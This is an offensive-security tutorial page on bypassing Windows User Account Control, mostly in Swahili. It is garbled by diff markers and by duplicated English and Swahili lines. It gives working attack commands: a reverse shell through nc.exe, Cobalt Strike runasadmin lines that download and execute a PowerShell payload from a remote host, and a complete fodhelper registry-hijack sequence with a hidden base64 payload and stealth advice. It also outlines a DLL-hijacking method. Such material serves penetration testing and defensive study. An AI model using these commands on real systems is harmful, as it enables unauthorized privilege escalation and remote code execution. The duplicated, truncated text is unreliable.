| [User Account Control: Detect application installations and prompt for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation) | EnableInstallerDetection | Enabled (default for home) Disabled (default for enterprise) |
| [User Account Control: Only elevate executables that are signed and validated](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated) | ValidateAdminCodeSignatures | Disabled |
| [User Account Control: Only elevate UIAccess applications that are installed in secure locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations) | EnableSecureUIAPaths | Enabled |
| [User Account Control: Run all administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode) | EnableLUA | Enabled |
| [User Account Control: Switch to the secure desktop when prompting for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation) | PromptOnSecureDesktop | Enabled |
| [User Account Control: Virtualize file and registry write failures to per-user locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations) | EnableVirtualization | Enabled |
| [User Account Control: Admin Approval Mode for the built-in Administrator account](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account) | FilterAdministratorToken | Imezimwa |
| [User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle | Imezimwa |
| [User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode) | ConsentPromptBehaviorAdmin | Omba idhini kwa binaries zisizo za Windows |
| [User Account Control: Behavior of the elevation prompt for standard users](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users) | ConsentPromptBehaviorUser | Ombwa taarifa za kuingia kwenye desktop salama |
| [User Account Control: Detect application installations and prompt for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation) | EnableInstallerDetection | Imewezeshwa (chaguo-msingi kwa home) Imezimwa (chaguo-msingi kwa enterprise) |
| [User Account Control: Only elevate executables that are signed and validated](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated) | ValidateAdminCodeSignatures | Imezimwa |
| [User Account Control: Only elevate UIAccess applications that are installed in secure locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations) | EnableSecureUIAPaths | Imewezeshwa |
| [User Account Control: Run all administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode) | EnableLUA | Imewezeshwa |
| [User Account Control: Switch to the secure desktop when prompting for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation) | PromptOnSecureDesktop | Imewezeshwa |
| [User Account Control: Virtualize file and registry write failures to per-user locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations) | EnableVirtualization | Imewezeshwa |
### UAC Bypass Theory
Baadhi ya programu zina **autoelevated automatically** ikiwa **mtumiaji ni** sehemu ya **kikundi cha wasimamizi**. Binaries hizi zina ndani ya _**Manifests**_ chaguo la _**autoElevate**_ lenye thamani _**True**_. Binary inapaswa kuwa **imeandikwa saini na Microsoft** pia.
Baadhi ya programu zinapewa **autoelevated automatically** ikiwa **mtumiaji ni mwanachama** wa **kundi la administrator**. Binaries hizi zina ndani ya _**Manifests**_ chaguo la _**autoElevate**_ lenye thamani _**True**_. Binary pia lazima iwe **imesainiwa na Microsoft**.
Mchakato mwingi wa auto-elevate unatoa **ufanisi kupitia vitu vya COM au seva za RPC**, ambazo zinaweza kuitwa kutoka kwa michakato inayofanya kazi na integrity ya kati (ruhusa za mtumiaji wa kawaida). Kumbuka kwamba COM (Component Object Model) na RPC (Remote Procedure Call) ni mbinu ambazo programu za Windows hutumia kuwasiliana na kutekeleza kazi kati ya michakato tofauti. Kwa mfano, **`IFileOperation COM object`** imeundwa kushughulikia operesheni za faili (kunakili, kufuta, kuhamasisha) na inaweza kuongeza ruhusa kiotomatiki bila kuonyeshwa.
Mchakato wa auto-elevate mwingi huweka **utendaji kupitia COM objects au RPC servers**, ambao yanaweza kuitwa kutoka kwa michakato inayokimbia kwa integrity ya medium (idhani ya mtumiaji wa kawaida). Kumbuka COM (Component Object Model) na RPC (Remote Procedure Call) ni mbinu ambazo programu za Windows hutumia kuwasiliana na kutekeleza kazi kati ya michakato tofauti. Kwa mfano, **`IFileOperation COM object`** imetengenezwa kushughulikia shughuli za faili (kopi, kufuta, kuhamisha) na inaweza auto-elevate vibali bila ombi.
Kumbuka kwamba baadhi ya ukaguzi unaweza kufanywa, kama kuangalia ikiwa mchakato ulifanywa kutoka kwenye **System32 directory**, ambayo inaweza kupuuziliwa mbali kwa mfano **kuingiza ndani ya explorer.exe** au executable nyingine iliyoko System32.
Kumbuka kwamba baadhi ya ukaguzi unaweza kufanywa, kama kuangalia ikiwa mchakato ulitendewa kutoka kwa **System32 directory**, ambayo inaweza kupitishwa kwa mfano kwa **kufunya katika explorer.exe** au executable nyingine iliyoko System32.
Njia nyingine ya kupita ukaguzi hizi ni **kubadilisha PEB**. Kila mchakato katika Windows una Block ya Mazingira ya Mchakato (PEB), ambayo inajumuisha data muhimu kuhusu mchakato, kama vile njia yake ya executable. Kwa kubadilisha PEB, washambuliaji wanaweza kudanganya (spoof) eneo la mchakato wao mbaya, na kuifanya ionekane inafanya kazi kutoka kwenye directory iliyoaminika (kama system32). Taarifa hii iliyodanganywa inadanganya kitu cha COM kujiinua kiotomatiki bila kumwambia mtumiaji.
Njia nyingine ya kupitishwa kwa ukaguzi huu ni **kurekebisha PEB**. Kila mchakato katika Windows una Process Environment Block (PEB), ambayo inajumuisha data muhimu kuhusu mchakato, kama njia ya executable yake. Kwa kurekebisha PEB, mashambulizi wanaweza kuiga (spoof) mahali pa mchakato wao hatari, kuonekana kama inaruka kutoka kwa saraka ya kuaminika (kama system32). Taarifa hii iliyodanganywa inamshawishi COM object auto-elevate vibali bila kumwuliza mtumiaji.
Kisha, ili **kupita** **UAC** (kuinua kutoka **kiwango** cha kati **hadi cha juu**) baadhi ya washambuliaji hutumia aina hii ya binaries ili **kutekeleza msimbo wowote** kwa sababu itatekelezwa kutoka kwenye **mchakato wa kiwango cha juu**.
Kisha, ili **kupitisha** **UAC** (kuinua kutoka kwa integrity ya **medium** hadi **high**), baadhi ya mashambulizi hutumia aina hizi za binaries kutekeleza **code yoyote** kwa sababu italetea kutekelezwa kutoka kwa mchakato wa integrity ya High.
Unaweza **kuangalia** _**Manifest**_ ya binary ukitumia zana _**sigcheck.exe**_ kutoka Sysinternals. (`sigcheck.exe -m <file>`) Na unaweza **kuona** **kiwango cha integrity** cha michakato ukitumia _Process Explorer_ au _Process Monitor_ (ya Sysinternals).
Unaweza **kuangalia** _**Manifest**_ ya binary kwa kutumia zana _**sigcheck.exe**_ kutoka Sysinternals. (`sigcheck.exe -m <file>`) Na unaweza **kuona** ngazi ya **integrity** ya michakato kwa kutumia _Process Explorer_ au _Process Monitor_ (ya Sysinternals).
### Check UAC
Ili kuthibitisha ikiwa UAC imewezeshwa fanya:
Ili kuthibitisha kama UAC imewezeshwa fanya:
```
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1
```
Ikiwa ni **`1`** basi UAC ime **wezeshwa**, ikiwa ni **`0`** au haipo, basi UAC ni **isiyo active**.
Kama ni **`1`** basi UAC imewezeshwa, ikiwa ni **`0`** au haipo, basi UAC haifanyi kazi.
Kisha, angalia **ni kiwango gani** kimewekwa:
```
@ -61,29 +62,29 @@ REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin REG_DWORD 0x5
```
- Ikiwa **`0`** basi, UAC haitatoa ujumbe (kama **imezimwa**)
- Ikiwa **`1`** msimamizi **anaulizwa jina la mtumiaji na nenosiri** ili kutekeleza faili ya binary kwa haki za juu (katika Desktop Salama)
- Ikiwa **`2`** (**Daima niarifu**) UAC daima itauliza uthibitisho kwa msimamizi anapojaribu kutekeleza kitu chenye mamlaka ya juu (katika Desktop Salama)
- Ikiwa **`3`** kama `1` lakini si lazima katika Desktop Salama
- Ikiwa **`4`** kama `2` lakini si lazima katika Desktop Salama
- ikiwa **`5`**(**kawaida**) itauliza msimamizi kuthibitisha kuendesha binaries zisizo za Windows kwa mamlaka ya juu
- If **`0`** then, UAC won't prompt (like **disabled**)
- If **`1`** the admin is **asked for username and password** to execute the binary with high rights (on Secure Desktop)
- If **`2`** (**Always notify me**) UAC will always ask for confirmation to the administrator when he tries to execute something with high privileges (on Secure Desktop)
- If **`3`** like `1` but not necessary on Secure Desktop
- If **`4`** like `2` but not necessary on Secure Desktop
- if **`5`**(**default**) it will ask the administrator to confirm to run non Windows binaries with high privileges
Kisha, unapaswa kuangalia thamani ya **`LocalAccountTokenFilterPolicy`**\
Ikiwa thamani ni **`0`**, basi, mtumiaji tu wa **RID 500** (**Msimamizi wa ndani**) anaweza kufanya **kazi za usimamizi bila UAC**, na ikiwa ni `1`, **akaunti zote ndani ya kundi la "Administrators"** zinaweza kufanya hivyo.
Then, you have to take a look at the value of **`LocalAccountTokenFilterPolicy`**\
If the value is **`0`**, then, only the **RID 500** user (**built-in Administrator**) is able to perform **admin tasks without UAC**, and if its `1`, **all accounts inside "Administrators"** group can do them.
Na, hatimaye angalia thamani ya funguo **`FilterAdministratorToken`**\
Ikiwa **`0`**(kawaida), akaunti ya **Msimamizi wa ndani inaweza** kufanya kazi za usimamizi wa mbali na ikiwa **`1`** akaunti ya msimamizi wa ndani **haiwezi** kufanya kazi za usimamizi wa mbali, isipokuwa `LocalAccountTokenFilterPolicy` imewekwa kuwa `1`.
And, finally take a look at the value of the key **`FilterAdministratorToken`**\
If **`0`**(default), the **built-in Administrator account can** do remote administration tasks and if **`1`** the built-in account Administrator **cannot** do remote administration tasks, unless `LocalAccountTokenFilterPolicy` is set to `1`.
#### Muhtasari
#### Summary
- Ikiwa `EnableLUA=0` au **haipo**, **hakuna UAC kwa mtu yeyote**
- Ikiwa `EnableLua=1` na **`LocalAccountTokenFilterPolicy=1` , Hakuna UAC kwa mtu yeyote**
- Ikiwa `EnableLua=1` na **`LocalAccountTokenFilterPolicy=0` na `FilterAdministratorToken=0`, Hakuna UAC kwa RID 500 (Msimamizi wa ndani)**
- Ikiwa `EnableLua=1` na **`LocalAccountTokenFilterPolicy=0` na `FilterAdministratorToken=1`, UAC kwa kila mtu**
- If `EnableLUA=0` or **doesn't exist**, **no UAC for anyone**
- If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=1` , No UAC for anyone**
- If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=0`, No UAC for RID 500 (Built-in Administrator)**
- If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=1`, UAC for everyone**
Taarifa hii yote inaweza kukusanywa kwa kutumia moduli ya **metasploit**: `post/windows/gather/win_privs`
All this information can be gathered using the **metasploit** module: `post/windows/gather/win_privs`
Unaweza pia kuangalia makundi ya mtumiaji wako na kupata kiwango cha uaminifu:
You can also check the groups of your user and get the integrity level:
```
net user %username%
whoami /groups | findstr Level
@ -91,15 +92,15 @@ whoami /groups | findstr Level
## UAC bypass
> [!TIP]
> Kumbuka kwamba ikiwa una ufikiaji wa picha kwa mwathirika, UAC bypass ni rahisi kwani unaweza kubofya tu "Ndio" wakati ujumbe wa UAC unapoonekana
> Kumbuka kwamba ikiwa una ufikiaji wa grafiki kwa upande wa mwathiriwa, UAC bypass ni rahisi kwani unaweza kubofya "Yes" unapopokea onyo la UAC
UAC bypass inahitajika katika hali zifuatazo: **UAC imewashwa, mchakato wako unafanya kazi katika muktadha wa uaminifu wa kati, na mtumiaji wako ni sehemu ya kundi la wasimamizi**.
UAC bypass inahitajika katika hali zifuatazo: **UAC imewashwa, mchakato wako unakimbia katika muktadha wa medium integrity, na mtumiaji wako ni sehemu ya administrators group**.
Ni muhimu kutaja kwamba ni **vigumu zaidi kupita UAC ikiwa iko katika kiwango cha juu zaidi cha usalama (Daima) kuliko ikiwa iko katika viwango vingine vyovyote (Kawaida).**
Ni muhimu kutaja kwamba ni **ngumu zaidi ku-bypass UAC ikiwa iko katika kiwango cha juu kabisa cha usalama (Always) kuliko ikiwa iko katika mojawapo ya viwango vingine (Default).**
### UAC disabled
### UAC imezimwa
Ikiwa UAC tayari imezimwa (`ConsentPromptBehaviorAdmin` ni **`0`**) unaweza **kutekeleza shell ya kinyume na ruhusa za admin** (kiwango cha juu cha uaminifu) ukitumia kitu kama:
Ikiwa UAC tayari imezimwa (`ConsentPromptBehaviorAdmin` ni **`0`**) unaweza **execute a reverse shell with admin privileges** (high integrity level) kwa kutumia kitu kama:
```bash
#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
@ -110,12 +111,12 @@ Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10
- [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/)
- [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html)
### **Sana** Msingi UAC "bypass" (ufikiaji wa mfumo wa faili kamili)
### **Msingi Sana** UAC "bypass" (upatikanaji kamili wa mfumo wa faili)
Ikiwa una shell na mtumiaji ambaye yuko ndani ya kundi la Wasimamizi unaweza **kuunganisha C$** iliyoshirikiwa kupitia SMB (mfumo wa faili) ndani ya diski mpya na utakuwa na **ufikiaji wa kila kitu ndani ya mfumo wa faili** (hata folda ya nyumbani ya Msimamizi).
Ikiwa una shell na mtumiaji aliyeko ndani ya kikundi cha Administrators, unaweza **mount the C$** iliyoshirikiwa kupitia SMB (file system) kama drive mpya ndani ya eneo la mfumo na utapata **upatikanaji wa kila kitu ndani ya mfumo wa faili** (hata folda ya nyumbani ya Administrator).
> [!WARNING]
> **Inaonekana kama hila hii haitumiki tena**
> **Inaonekana hila hii haifanyi kazi tena**
```bash
net use Z: \\127.0.0.1\c$
cd C$
@ -123,9 +124,9 @@ cd C$
#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop
```
### UAC bypass with cobalt strike
### UAC bypass na cobalt strike
Mbinu za Cobalt Strike zitaweza kufanya kazi tu ikiwa UAC haijawekwa kwenye kiwango chake cha juu cha usalama.
Mbinu za Cobalt Strike zitafanya kazi tu ikiwa UAC haijawekwa kwenye kiwango chake cha juu kabisa cha usalama.
```bash
# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
@ -137,18 +138,17 @@ runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-obj
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
```
**Empire** na **Metasploit** pia zina moduli kadhaa za **kuepuka** **UAC**.
**Empire** na **Metasploit** pia zina moduli kadhaa za **bypass** **UAC**.
### KRBUACBypass
Hati na zana katika [https://github.com/wh0amitz/KRBUACBypass](https://github.com/wh0amitz/KRBUACBypass)
Nyaraka na zana ziko katika [https://github.com/wh0amitz/KRBUACBypass](https://github.com/wh0amitz/KRBUACBypass)
### UAC bypass exploits
[**UACME** ](https://github.com/hfiref0x/UACME)ambayo ni **mkusanyiko** wa exploits kadhaa za UAC bypass. Kumbuka kwamba utahitaji **kukusanya UACME ukitumia visual studio au msbuild**. Kukusanya kutaunda executable kadhaa (kama `Source\Akagi\outout\x64\Debug\Akagi.exe`), utahitaji kujua **ni ipi unahitaji.**\
Unapaswa **kuwa makini** kwa sababu baadhi ya kuepuka kutatoa **maonyo kwa programu nyingine** ambazo zita **onya** **mtumiaji** kwamba kuna kitu kinatokea.
[**UACME** ](https://github.com/hfiref0x/UACME) ambayo ni **mkusanyiko** wa kadhaa UAC bypass exploits. Kumbuka kwamba utahitaji **compile UACME using Visual Studio or msbuild**. Ujenzi huo utatengeneza executables kadhaa (kama `Source\Akagi\outout\x64\Debug\Akagi.exe`), utahitaji kujua **ni ipi unayohitaji.**\ Unapaswa **kuwa mwangalifu** kwa sababu baadhi ya bypasses zitaamsha **programu nyingine** ambazo zitatuma **taarifa** kwa **mtumiaji** kwamba kuna kitu kinaendelea.
UACME ina **toleo la kujenga ambalo kila mbinu ilianza kufanya kazi**. Unaweza kutafuta mbinu inayohusisha toleo lako:
UACME ina **build version kutoka ambako kila mbinu ilianza kufanya kazi**. Unaweza kutafuta mbinu inayoathiri matoleo yako:
```
PS C:\> [environment]::OSVersion.Version
@ -156,13 +156,45 @@ Major Minor Build Revision
----- ----- ----- --------
10 0 14393 0
```
Also, using [this](https://en.wikipedia.org/wiki/Windows_10_version_history) page you get the Windows release `1607` from the build versions.
Pia, kwa kutumia [this](https://en.wikipedia.org/wiki/Windows_10_version_history) page utapata toleo la Windows `1607` kutoka kwa matoleo ya build.
### UAC Bypass fodhelper.exe (Registry hijack)
Binary ya kuaminika `fodhelper.exe` huinuliwa kiotomatiki kwenye Windows za kisasa. Ikitumika, inalenga njia ya rejista ya kila mtumiaji hapa chini bila kuthibitisha verb `DelegateExecute`. Kuweka amri hapo kunaruhusu mchakato wa Medium Integrity (mtumiaji yuko kwenye Administrators) kuanzisha mchakato wa High Integrity bila onyo la UAC.
Njia ya rejista inayoulizwa na fodhelper:
```
HKCU\Software\Classes\ms-settings\Shell\Open\command
```
Hatua za PowerShell (weka payload yako, kisha trigger):
```powershell
# Optional: from a 32-bit shell on 64-bit Windows, spawn a 64-bit PowerShell for stability
C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell -nop -w hidden -c "$PSVersionTable.PSEdition"
# 1) Create the vulnerable key and values
New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force | Out-Null
# 2) Set default command to your payload (example: reverse shell or cmd)
# Replace <BASE64_PS> with your base64-encoded PowerShell (or any command)
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -e <BASE64_PS>" -Force
# 3) Trigger auto-elevation
Start-Process -FilePath "C:\\Windows\\System32\\fodhelper.exe"
# 4) (Recommended) Cleanup
Remove-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open" -Recurse -Force
```
Notes:
- Inafanya kazi wakati mtumiaji wa sasa ni mwanachama wa Administrators na kiwango cha UAC ni default/lenient (si Always Notify na vikwazo vya ziada).
- Tumia njia ya `sysnative` kuanzisha PowerShell ya 64-bit kutoka mchakato wa 32-bit kwenye Windows 64-bit.
- Payload inaweza kuwa amri yoyote (PowerShell, cmd, au njia ya EXE). Epuka UI zinazochochea kusubiri ruhusa kwa ajili ya kimya (stealth).
#### More UAC bypass
**All** the techniques used here to bypass AUC **require** a **full interactive shell** with the victim (a common nc.exe shell is not enough).
You can get using a **meterpreter** session. Migrate to a **process** that has the **Session** value equals to **1**:
Unaweza kupata kwa kutumia session ya **meterpreter**. Migrate kwenda kwa **process** ambayo ina thamani ya **Session** sawa na **1**:
![](<../../images/image (863).png>)
@ -170,27 +202,33 @@ You can get using a **meterpreter** session. Migrate to a **process** that has t
### UAC Bypass with GUI
If you have access to a **GUI you can just accept the UAC prompt** when you get it, you don't really need a bypass it. So, getting access to a GUI will allow you to bypass the UAC.
Ikiwa una ufikiaji wa **GUI unaweza tu kukubali UAC prompt** unapoupata, kwa hakika huhitaji bypass. Hivyo, kupata ufikiaji wa GUI kutakuwezesha kupita UAC.
Moreover, if you get a GUI session that someone was using (potentially via RDP) there are **some tools that will be running as administrator** from where you could **run** a **cmd** for example **as admin** directly without being prompted again by UAC like [**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif). This might be a bit more **stealthy**.
Zaidi ya hayo, ikiwa unapata session ya GUI ambayo mtu alikuwa anaitumia (inawezekana kupitia RDP) kuna **zana baadhi zitakazoendeshwa kama administrator** ambapo unaweza **kufanya** **cmd** kwa mfano **as admin** moja kwa moja bila kuonyeshwa tena na UAC kama [**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif). Hii inaweza kuwa kidogo zaidi **stealthy**.
### Noisy brute-force UAC bypass
If you don't care about being noisy you could always **run something like** [**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin) that **ask to elevate permissions until the user does accepts it**.
Ikiwa hukujali kuhusu kelele unaweza daima **kimbia kitu kama** [**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin) kinachotaka kuinua ruhusa hadi mtumiaji atakubali.
### Your own bypass - Basic UAC bypass methodology
If you take a look to **UACME** you will note that **most UAC bypasses abuse a Dll Hijacking vulnerabilit**y (mainly writing the malicious dll on _C:\Windows\System32_). [Read this to learn how to find a Dll Hijacking vulnerability](../windows-local-privilege-escalation/dll-hijacking/index.html).
Ikiwa utaangalia **UACME** utagundua kwamba **uwezekano mkubwa UAC bypasses hutumia udhaifu wa Dll Hijacking** (hasa kuandika dll hatari kwenye _C:\Windows\System32_). [Read this to learn how to find a Dll Hijacking vulnerability](../windows-local-privilege-escalation/dll-hijacking/index.html).
1. Find a binary that will **autoelevate** (check that when it is executed it runs in a high integrity level).
2. With procmon find "**NAME NOT FOUND**" events that can be vulnerable to **DLL Hijacking**.
3. You probably will need to **write** the DLL inside some **protected paths** (like C:\Windows\System32) were you don't have writing permissions. You can bypass this using:
1. **wusa.exe**: Windows 7,8 and 8.1. It allows to extract the content of a CAB file inside protected paths (because this tool is executed from a high integrity level).
2. **IFileOperation**: Windows 10.
4. Prepare a **script** to copy your DLL inside the protected path and execute the vulnerable and autoelevated binary.
1. Tafuta binary ambayo ita **autoelevate** (angalia kwamba inapoendeshwa inaendesha kwenye high integrity level).
2. Kwa kutumia procmon tafuta matukio ya "**NAME NOT FOUND**" ambayo yanaweza kuwa dhaifu kwa **DLL Hijacking**.
3. Huenda utahitaji **kuandika** DLL ndani ya baadhi ya **protected paths** (kama C:\Windows\System32) ambapo huna ruhusa ya kuandika. Unaweza kupita hili kwa kutumia:
1. **wusa.exe**: Windows 7,8 na 8.1. Inaruhusu kutoa yaliyomo ya CAB ndani ya protected paths (kwa sababu zana hii inaendeshwa kutoka high integrity level).
2. **IFileOperation**: Windows 10.
4. Andaa **script** ili kunakili DLL yako ndani ya protected path na uendeshe binary dhaifu na autoelevated.
### Another UAC bypass technique
Consists on watching if an **autoElevated binary** tries to **read** from the **registry** the **name/path** of a **binary** or **command** to be **executed** (this is more interesting if the binary searches this information inside the **HKCU**).
Inajumuisha kuangalia kama **autoElevated binary** inajaribu **kusoma** kutoka kwa **registry** jina/nafasi ya **binary** au **command** itakayotekelezwa (hii inakuwa ya kuvutia zaidi ikiwa binary inatafuta taarifa hii ndani ya **HKCU**).
## References
- [HTB: Rainbow SEH overflow to RCE over HTTP (0xdf) fodhelper UAC bypass steps](https://0xdf.gitlab.io/2025/08/07/htb-rainbow.html)
- [LOLBAS: Fodhelper.exe](https://lolbas-project.github.io/lolbas/Binaries/Fodhelper/)
- [Microsoft Docs How User Account Control works](https://learn.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works)
- [UACME UAC bypass techniques collection](https://github.com/hfiref0x/UACME)
{{#include ../../banners/hacktricks-training.md}}